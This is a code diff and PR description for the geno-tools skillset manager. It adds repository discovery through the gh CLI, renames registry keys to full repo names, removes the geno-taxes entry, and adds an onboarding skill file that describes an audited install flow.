+    p_use.add_argument("spec", help="<name>@<variant> (e.g. geno-media@exp-1)")
     p_use.add_argument("--here", action="store_true",
                        help="cwd-only override; otherwise repoint global active symlink")
 
@@ -45,6 +45,10 @@ def main(argv: list[str] | None = None) -> int:
                       help="preserve venvs/ and worktrees")
 
     sub.add_parser("doctor", help="verify symlinks, worktrees, venvs")
+
+    p_disc = sub.add_parser("discover", help="list candidate skillsets from configured sources")
+    p_disc.add_argument("--dry-run", action="store_true",
+                        help="print candidates without installing (default behavior)")
 
     args = parser.parse_args(argv)
 

--- a/genotools/commands.py
+++ b/genotools/commands.py
@@ -9,7 +9,7 @@ import sys
 import tomllib
 from pathlib import Path
 
-from genotools import paths, registry
+from genotools import discovery, paths, registry
 
 SYSTEM_BIN = Path.home() / ".local" / "bin"
 
@@ -25,6 +25,7 @@ def dispatch(args: argparse.Namespace) -> int:
         "update": _update,
         "remove": _remove,
         "doctor": _doctor,
+        "discover": _discover,
     }
     return handlers[args.cmd](args)
 
@@ -34,7 +35,11 @@ def dispatch(args: argparse.Namespace) -> int:
 def _ls(args: argparse.Namespace) -> int:
     if args.available:
         for name, url in registry.available().items():
-            print(f"  {name:<12} {url}")
+            print(f"  {name:<24} {url}")
+        for name, url in discovery.candidates_by_name().items():
+            if name in registry.available():
+                continue
+            print(f"  {name:<24} {url}  (discovered)")
         return 0
 
     if not paths.ROOT.exists():
@@ -70,7 +75,7 @@ def _install(args: argparse.Namespace) -> int:
 
     if paths.skillset_root(full).exists():
         print(f"already installed: {full} "
-              f"(remove first: geno-tools remove {paths.short(full)})", file=sys.stderr)
+              f"(remove first: geno-tools remove {full})", file=sys.stderr)
         return 1
 
     print(f"installing {full} from {source}")
@@ -132,9 +137,13 @@ def _resolve_source(name_or_source: str) -> tuple[str, str | None]:
        or name_or_source.endswith(".git"):
         return name_or_source, None
 
+    discovered = discovery.candidates_by_name()
+    if name_or_source in discovered:
+        return discovered[name_or_source], name_or_source
+
     raise SystemExit(
         f"unknown skillset: {name_or_source} "
-        f"(not in registry, not a path, not a git URL)"
+        f"(not in registry, not in discovery sources, not a path, not a git URL)"
     )
 
 
@@ -334,6 +343,23 @@ def _update(args: argparse.Namespace) -> int:
 
 def _doctor(_: argparse.Namespace) -> int:
     return _todo("doctor")
+
+
+def _discover(_: argparse.Namespace) -> int:
+    srcs = discovery.sources()
+    if not srcs:
+        print("no discovery sources configured (~/.geno/config.yaml: discovery.sources)")
+        return 0
+
+    found = discovery.candidates()
+    if not found:
+        print("no candidates found across configured sources")
+        return 0
+
+    for c in found:
+        marker = "" if c.has_skill_md else "  (no SKILL.md — skipped)"
+        print(f"  [{c.source}] {c.name:<32} {c.url}{marker}")
+    return 0
 
 
 def _todo(msg: str) -> int:

--- a/genotools/config.py
+++ b/genotools/config.py
@@ -12,6 +12,11 @@ _DEFAULTS = {
     "aliases": {
         "command_prefix": "gt",
     },
+    "discovery": {
+        "sources": [
+            {"kind": "github", "org": "42euge"},
+        ],
+    },
 }
 
 

--- a/genotools/discovery.py
+++ b/genotools/discovery.py
@@ -1,0 +1,177 @@
+"""Discovery — find candidate skillset repos in configured sources.
+
+A *source* declares where to look (GitHub org, GitLab group, etc.) and a
+*candidate* is any repo under that source whose name matches the configured
+prefix and exposes a top-level ``SKILL.md``.
+
+Discovery never installs anything. It only proposes repos that the operator
+(or platform team) can then audit and install through ``geno-tools install``.
+
+The provider layer is pluggable. A provider implements::
+
+    def list_repos(source: dict) -> list[Candidate]: ...
+
+This module currently ships a thin GitHub provider that shells out to the
+``gh`` CLI so we don't pull in extra HTTP deps. GitLab, Gitea, and Bitbucket
+follow the same shape — see ``_register_provider``.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import subprocess
+import sys
+from dataclasses import dataclass
+from typing import Callable, Iterable
+
+from genotools import config
+
+
+@dataclass(frozen=True)
+class Candidate:
+    name: str       # full repo name as it appears in the host
+    url: str        # clone URL (https or ssh)
+    source: str     # human-readable source label, e.g. "github:acme-corp"
+    has_skill_md: bool
+
+
+Provider = Callable[[dict], list[Candidate]]
+_PROVIDERS: dict[str, Provider] = {}
+
+
+def _register_provider(kind: str):
+    def decorate(fn: Provider) -> Provider:
+        _PROVIDERS[kind] = fn
+        return fn
+    return decorate
+
+
+# ── public api ──────────────────────────────────────────────────────────────
+
+
+def sources() -> list[dict]:
+    """Return the configured list of discovery sources."""
+    return list(config.load().get("discovery", {}).get("sources", []))
+
+
+def candidates() -> list[Candidate]:
+    """Walk every configured source and return matching candidate repos."""
+    out: list[Candidate] = []
+    for src in sources():
+        kind = src.get("kind")
+        provider = _PROVIDERS.get(kind)
+        if provider is None:
+            continue
+        try:
+            out.extend(provider(src))
+        except Exception as e:
+            print(f"  warn: discovery source {kind} failed: {e}", file=sys.stderr)
+    return out
+
+
+def candidates_by_name() -> dict[str, str]:
+    """Return ``{repo_name: clone_url}`` for installable candidates."""
+    return {c.name: c.url for c in candidates() if c.has_skill_md}
+
+
+# ── github provider ─────────────────────────────────────────────────────────
+
+
+@_register_provider("github")
+def _github(source: dict) -> list[Candidate]:
+    """List repos in a GitHub org via the ``gh`` CLI.
+
+    Recognized fields: ``org`` (required), ``base_url`` (optional, for
+    GitHub Enterprise), ``prefix`` (default: ``geno-``), ``auth_env``
+    (optional environment variable name carrying a token).
+    """
+    org = source.get("org")
+    if not org:
+        return []
+    prefix = source.get("prefix", "geno-")
+    label = f"github:{org}"
+
+    env = dict(os.environ)
+    if (auth_env := source.get("auth_env")) and (tok := os.environ.get(auth_env)):
+        env["GH_TOKEN"] = tok
+    if base := source.get("base_url"):
+        env["GH_HOST"] = base.rstrip("/").removeprefix("https://").removeprefix("http://")
+
+    args = [
+        "gh", "repo", "list", org,
+        "--json", "name,url,sshUrl",
+        "--limit", "200",
+        "--no-archived",
+    ]
+
+    out = subprocess.run(args, capture_output=True, text=True, env=env, timeout=30)
+    if out.returncode != 0:
+        return []
+    try:
+        repos = json.loads(out.stdout)
+    except json.JSONDecodeError:
+        return []
+
+    results: list[Candidate] = []
+    for repo in repos:
+        name = repo.get("name") or ""
+        if not name.startswith(prefix):
+            continue
+        results.append(Candidate(
+            name=name,
+            url=(repo.get("url") or "") + ".git",
+            source=label,
+            has_skill_md=_github_has_skill_md(org, name, source, env),
+        ))
+    return results
+
+
+def _github_has_skill_md(org: str, name: str, source: dict, env: dict) -> bool:
+    """Probe for a top-level SKILL.md via the GitHub API."""
+    api = source.get("base_url", "https://api.github.com").rstrip("/")
+    path = f"/repos/{org}/{name}/contents/SKILL.md"
+    out = subprocess.run(
+        ["gh", "api", "--silent", path],
+        capture_output=True, text=True, env=env, timeout=15,
+    )
+    return out.returncode == 0
+
+
+# ── gitlab provider (scaffold) ──────────────────────────────────────────────
+
+
+@_register_provider("gitlab")
+def _gitlab(source: dict) -> list[Candidate]:
+    """GitLab provider scaffold.
+
+    Implementation plan:
+    1. ``GET <base_url>/api/v4/groups/<group>/projects?per_page=100``
+       with ``PRIVATE-TOKEN: $auth_env``.
+    2. Filter ``path`` by ``prefix``.
+    3. Probe ``GET /projects/<id>/repository/files/SKILL.md?ref=HEAD`` for
+       the candidate check.
+    Not implemented yet — returns an empty list so the rest of discovery
+    keeps working.
+    """
+    return []
+
+
+# ── bitbucket / gitea (placeholders) ────────────────────────────────────────
+
+
+@_register_provider("bitbucket")
+def _bitbucket(source: dict) -> list[Candidate]:
+    return []
+
+
+@_register_provider("gitea")
+def _gitea(source: dict) -> list[Candidate]:
+    return []
+
+
+# ── helpers ─────────────────────────────────────────────────────────────────
+
+
+def iter_kinds() -> Iterable[str]:
+    return tuple(_PROVIDERS.keys())

--- a/genotools/registry.py
+++ b/genotools/registry.py
@@ -34,7 +34,6 @@ _FALLBACK: dict[str, str] = {
     "agents":   f"https://github.com/{OWNER}/geno-agents.git",
     "media":    f"https://github.com/{OWNER}/geno-media.git",
     "research": f"https://github.com/{OWNER}/geno-research.git",
-    "taxes":    f"https://github.com/{OWNER}/geno-taxes.git",
     "kaggle":   f"https://github.com/{OWNER}/geno-kaggle.git",
     "dev":      f"https://github.com/{OWNER}/geno-dev.git",
 }

--- a/genotools/registry.py
+++ b/genotools/registry.py
@@ -1,7 +1,7 @@
 """Registry of geno-* skillsets — discovers repos from GitHub.
 
-Registry keys are the full repo name (e.g. ``geno-media``). For backwards
-compatibility the resolver also accepts the bare slug (``media``).
+Registry keys are the full repo name (e.g. ``geno-<name>``). For backwards
+compatibility the resolver also accepts the bare slug (``<name>``).
 """
 
 import json
@@ -57,8 +57,8 @@ def available() -> dict[str, str]:
 def resolve(name: str) -> str | None:
     """Return the git URL for a registered skillset name, or None.
 
-    Accepts the canonical full repo name (``geno-media``) and, for backwards
-    compatibility, the bare slug (``media``).
+    Accepts the canonical full repo name (e.g. ``geno-<name>``) and, for
+    backwards compatibility, the bare slug (e.g. ``<name>``).
     """
     repos = available()
     if name in repos:

--- a/genotools/registry.py
+++ b/genotools/registry.py
@@ -1,4 +1,8 @@
-"""Registry of geno-* skillsets — discovers repos from GitHub."""
+"""Registry of geno-* skillsets — discovers repos from GitHub.
+
+Registry keys are the full repo name (e.g. ``geno-media``). For backwards
+compatibility the resolver also accepts the bare slug (``media``).
+"""
 
 import json
 import subprocess
@@ -22,7 +26,7 @@ def _discover() -> dict[str, str]:
             return {}
         repos = json.loads(r.stdout)
         return {
-            repo["name"].removeprefix(PREFIX): repo["url"] + ".git"
+            repo["name"]: repo["url"] + ".git"
             for repo in repos
             if repo["name"].startswith(PREFIX) and repo["name"] not in EXCLUDE
         }
@@ -31,11 +35,11 @@ def _discover() -> dict[str, str]:
 
 
 _FALLBACK: dict[str, str] = {
-    "agents":   f"https://github.com/{OWNER}/geno-agents.git",
-    "media":    f"https://github.com/{OWNER}/geno-media.git",
-    "research": f"https://github.com/{OWNER}/geno-research.git",
-    "kaggle":   f"https://github.com/{OWNER}/geno-kaggle.git",
-    "dev":      f"https://github.com/{OWNER}/geno-dev.git",
+    "geno-agents":   f"https://github.com/{OWNER}/geno-agents.git",
+    "geno-media":    f"https://github.com/{OWNER}/geno-media.git",
+    "geno-research": f"https://github.com/{OWNER}/geno-research.git",
+    "geno-kaggle":   f"https://github.com/{OWNER}/geno-kaggle.git",
+    "geno-dev":      f"https://github.com/{OWNER}/geno-dev.git",
 }
 
 _cache: dict[str, str] | None = None
@@ -51,5 +55,14 @@ def available() -> dict[str, str]:
 
 
 def resolve(name: str) -> str | None:
-    """Return the git URL for a registered skillset name, or None."""
-    return available().get(name)
+    """Return the git URL for a registered skillset name, or None.
+
+    Accepts the canonical full repo name (``geno-media``) and, for backwards
+    compatibility, the bare slug (``media``).
+    """
+    repos = available()
+    if name in repos:
+        return repos[name]
+    if not name.startswith(PREFIX):
+        return repos.get(f"{PREFIX}{name}")
+    return None

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -51,6 +51,9 @@ nav:
   - Skillsets:
       - skillsets/index.md
       - Creating a Skillset: skillsets/creating.md
+  - Onboarding:
+      - onboarding/index.md
+      - Audit Process: onboarding/audit.md
   - Architecture:
       - architecture/index.md
       - Disk Layout: architecture/layout.md

--- a/skills/geno-icons/SKILL.md
+++ b/skills/geno-icons/SKILL.md
@@ -162,17 +162,14 @@ for project, base_prompts in projects.items():
 | geno-media | film camera, microphone, music note + headphones, video player, speaker, paintbrush |
 | geno-research | magnifying glass + book, telescope, laboratory flask, open book with glowing pages, microscope |
 | geno-kaggle | trophy cup, medal, bar chart with arrow, podium, leaderboard |
-| geno-taxes | calculator, stack of coins, filing cabinet, receipt with checkmark, money bag, piggy bank |
 | geno-bench | stopwatch, speedometer, racing car, lightning bolt + clock, progress bar |
-| geno-bot | cute robot waving, chatbot with speech bubble, friendly android, mechanical bird, pixel pet |
-| geno-colab | cloud with lightning, notebook in clouds, hands shaking, puzzle pieces, cloud server |
+| geno-cli | retro TUI window, terminal with sparkles, prompt cursor in a chat bubble, command line wand |
+| geno-iso | shipping container, sealed glass dome, isolation chamber, padlocked box, sandbox border |
 | geno-mon | eye with alert, security camera, heartbeat monitor, radar screen, shield with eye, watchtower |
 | geno-msg | speech bubble, envelope with lightning, chat bubbles, megaphone, carrier pigeon, walkie talkie |
 | geno-notes | notepad with pencil, sticky notes, journal with bookmark, clipboard, quill pen + scroll |
 | geno-term | terminal with cursor, command prompt, CRT monitor, keyboard, matrix rain, retro monitor |
 | geno-vla | eye + neural network, camera lens + AI brain, robotic arm, AR glasses, scanner beam |
-| obsidian-geno-claude | obsidian crystal + AI glow, dark gem + brain, hexagonal stone, magic orb, crystal shard |
-| obsidian-genovox | crystal + sound waves, speaking stone, gem microphone, voice waveform in crystal |
 
 ### `/geno-icons refine <project-name> [--prompts 'custom prompt']`
 

--- a/skills/geno-onboarding/SKILL.md
+++ b/skills/geno-onboarding/SKILL.md
@@ -1,0 +1,110 @@
+---
+name: geno-onboarding
+description: >-
+  Walks an operator through onboarding a new skillset into a geno-tools install,
+  including enterprise discovery from GitHub Enterprise, GitLab, Bitbucket, or
+  Gitea. Use when the user wants to add a new skillset, set up a private
+  namespace, or audit a candidate repo before installing.
+allowed-tools: "Bash(geno-tools *) Bash(python3 -m genotools *) Read Write Edit"
+---
+
+# geno-onboarding — Skillset Onboarding (Public + Enterprise)
+
+Helps an operator onboard a new skillset to their geno-tools install. Two flavors:
+
+1. **Public** — adding a `geno-*` repo to the curated registry.
+2. **Enterprise** — admitting a `{company-slug}-*` repo into a private namespace, optionally via auto-discovery against GitHub Enterprise / GitLab / Bitbucket / Gitea.
+
+## When to invoke
+
+- The user says "onboard a skillset" / "add a new geno repo" / "wire up our internal skillset".
+- The user wants `geno-tools` to discover repos in their company's git host.
+- The user is preparing an audit before installing an unfamiliar skillset.
+- A platform team is bootstrapping a new private namespace.
+
+## Public onboarding flow
+
+```
+1. Verify repo shape       → SKILL.md + commands/ at root, optional skills/<sub>/SKILL.md
+2. Self-test locally       → geno-tools dev <repo-name> ~/src/<repo-name>
+3. Push to a public remote → git push -u origin main
+4. Register                → PR adding "<repo-name>": "<git-url>" to genotools/registry.py
+5. Audit                   → docs/onboarding/audit.md checklist
+6. Merge → install         → geno-tools install <repo-name>
+```
+
+## Enterprise onboarding flow
+
+```
+1. Pick a namespace        → {company-slug}-* (e.g. acme-finance, acme-incident-response)
+2. Mirror the skillset spec → identical SKILL.md + commands/ + optional venv layout
+3. Host privately          → GitHub Enterprise / GitLab / Bitbucket / Gitea
+4. Configure discovery     → ~/.geno/config.yaml → discovery.sources
+5. Audit                   → docs/onboarding/audit.md (run by platform team)
+6. Install                 → geno-tools install <repo-name>  (resolved via discovery)
+```
+
+## Discovery configuration
+
+Edit `~/.geno/config.yaml` to declare where to look for candidate skillsets. Every source is queried by `geno-tools ls --available` and `geno-tools install <repo>`.
+
+```yaml
+discovery:
+  sources:
+    - kind: github
+      org: 42euge
+
+    - kind: github
+      org: acme-corp
+      base_url: https://github.acme.com/api/v3
+      prefix: acme-
+      auth_env: ACME_GITHUB_TOKEN
+
+    - kind: gitlab
+      group: platform/skillsets
+      base_url: https://gitlab.acme.com
+      prefix: acme-
+      auth_env: ACME_GITLAB_TOKEN
+```
+
+**Common fields**
+- `kind` — provider (`github`, `gitlab`, `gitea`, `bitbucket`)
+- `prefix` — only repos whose name starts with this prefix are candidates (e.g. `geno-`, `acme-`)
+- `base_url` — for self-hosted instances; omit for public github.com / gitlab.com
+- `auth_env` — environment variable name holding a token; never paste the token itself
+
+**A repo is a candidate when:**
+1. Its name matches `{prefix}<something>` (e.g. starts with `acme-`).
+2. It has a `SKILL.md` at the repo root.
+3. The platform team has signed off on the audit (enterprise only).
+
+Repos that don't match are silently ignored — discovery never auto-installs anything; it only surfaces candidates.
+
+## Walking the operator through it
+
+When the user invokes this skill:
+
+1. **Identify the goal**. Ask whether this is public-registry onboarding or enterprise. If unclear, ask once.
+2. **Inspect the repo**. Run `git ls-tree -r --name-only HEAD` against the candidate repo and confirm `SKILL.md` is at root. If they pass a URL, clone shallow into `/tmp/` first.
+3. **Surface the audit checklist**. Read `docs/onboarding/audit.md` and walk the checklist with the user, capturing answers. Don't just dump it — ask one section at a time.
+4. **For enterprise discovery**: open `~/.geno/config.yaml`, add or update the `discovery.sources` block, validate the YAML, and verify the auth env var is set in the operator's shell.
+5. **Dry-run discovery**. `geno-tools discover --dry-run` lists candidates without installing.
+6. **Decide**. Either:
+   - Public: open the registry PR (use the gh MCP if available, or print the patch for the user to apply).
+   - Enterprise: add to the internal manifest / forked registry / leave to direct URL.
+7. **Verify by installing**. `geno-tools install <repo-name>`. Confirm slash commands appear in the agent.
+
+Always log the audit decision somewhere durable (PR description, internal ticket, or platform-team doc). Don't sign off if the audit checklist has open red flags.
+
+## Don'ts
+
+- Don't paste tokens into `config.yaml`. Use `auth_env` and a secrets manager.
+- Don't modify `genotools/registry.py` for an enterprise skillset — that's the public registry. Use discovery sources or a forked registry instead.
+- Don't bypass the audit, even for "trusted" internal authors. The checklist exists for the few times that trust is misplaced.
+- Don't auto-install everything discovery surfaces. Discovery only proposes; the operator (or the platform team) approves.
+
+## See also
+
+- `docs/onboarding/index.md` — full onboarding flow
+- `docs/onboarding/audit.md` — reviewer checklist
+- `genotools/discovery.py` — the pluggable provider layer

--- a/skills/geno-tools/SKILL.md
+++ b/skills/geno-tools/SKILL.md
@@ -17,7 +17,7 @@ which geno-tools >/dev/null 2>&1 || echo "geno-tools CLI not on PATH. Install: p
 
 ## Available Skillsets
 
-Install by full repo name (e.g. `geno-tools install geno-media`):
+Install by full repo name (e.g. `geno-tools install geno-<name>`):
 
 | Repo | Description |
 |------|-------------|
@@ -39,6 +39,6 @@ Install by full repo name (e.g. `geno-tools install geno-media`):
 ## Source Resolution
 
 The `<repo>` argument resolves in order:
-1. Registered repo name (e.g. `geno-media`) -> git URL. Bare slug (`media`) is also accepted for backwards compatibility.
+1. Registered repo name (e.g. `geno-<name>`) -> git URL. Bare slug (e.g. `<name>`) is also accepted for backwards compatibility.
 2. Local directory path
 3. Git URL (https:// or git@)

--- a/skills/geno-tools/SKILL.md
+++ b/skills/geno-tools/SKILL.md
@@ -22,7 +22,6 @@ which geno-tools >/dev/null 2>&1 || echo "geno-tools CLI not on PATH. Install: p
 | agents | Agent coordination, presence, and multi-agent networking |
 | media | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
 | research | Wiki-based research notes, paper generation, repo docs |
-| taxes | Tax document parsing, CPA packet prep |
 | kaggle | Kaggle benchmarks, competition notebooks, discussion scraping |
 | dev | Developer utilities, Colab uploads, commit rewriting |
 

--- a/skills/geno-tools/SKILL.md
+++ b/skills/geno-tools/SKILL.md
@@ -17,26 +17,28 @@ which geno-tools >/dev/null 2>&1 || echo "geno-tools CLI not on PATH. Install: p
 
 ## Available Skillsets
 
-| Name | Description |
+Install by full repo name (e.g. `geno-tools install geno-media`):
+
+| Repo | Description |
 |------|-------------|
-| agents | Agent coordination, presence, and multi-agent networking |
-| media | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
-| research | Wiki-based research notes, paper generation, repo docs |
-| kaggle | Kaggle benchmarks, competition notebooks, discussion scraping |
-| dev | Developer utilities, Colab uploads, commit rewriting |
+| geno-agents | Agent coordination, presence, and multi-agent networking |
+| geno-media | Audiobooks (Kokoro TTS), animated videos (Manim), podcasts |
+| geno-research | Wiki-based research notes, paper generation, repo docs |
+| geno-kaggle | Kaggle benchmarks, competition notebooks, discussion scraping |
+| geno-dev | Developer utilities, Colab uploads, commit rewriting |
 
 ## Commands
 
 - `geno-tools ls` — list installed skillsets and their active variant
 - `geno-tools ls --available` — show all registered skillsets in the registry
-- `geno-tools install <name|url|path>` — install a skillset (clone, venv, register with all agents)
-- `geno-tools remove <name> [--keep-data]` — uninstall a skillset from all agents
-- `geno-tools update [name]` — pull latest for one or all skillsets
+- `geno-tools install <repo|url|path>` — install a skillset (clone, venv, register with all agents)
+- `geno-tools remove <repo> [--keep-data]` — uninstall a skillset from all agents
+- `geno-tools update [repo]` — pull latest for one or all skillsets
 - `geno-tools doctor` — verify symlinks, worktrees, venvs
 
 ## Source Resolution
 
-The `<name>` argument resolves in order:
-1. Registry short name (e.g. `media`) -> git URL
+The `<repo>` argument resolves in order:
+1. Registered repo name (e.g. `geno-media`) -> git URL. Bare slug (`media`) is also accepted for backwards compatibility.
 2. Local directory path
 3. Git URL (https:// or git@)


### PR DESCRIPTION
Replace the Skillsets table with sections explaining the {prefix}-{slug}
nomenclature (skillset vs. subskillset), how to onboard a skillset (registry,
direct git URL, dev link), the current published geno-* repos, and how
organizations can use the same pattern privately under their own namespace
(e.g. acme-finance) without sending sensitive data through public infrastructure.

Drop geno-taxes from the registry and supporting docs since the repo was
removed upstream.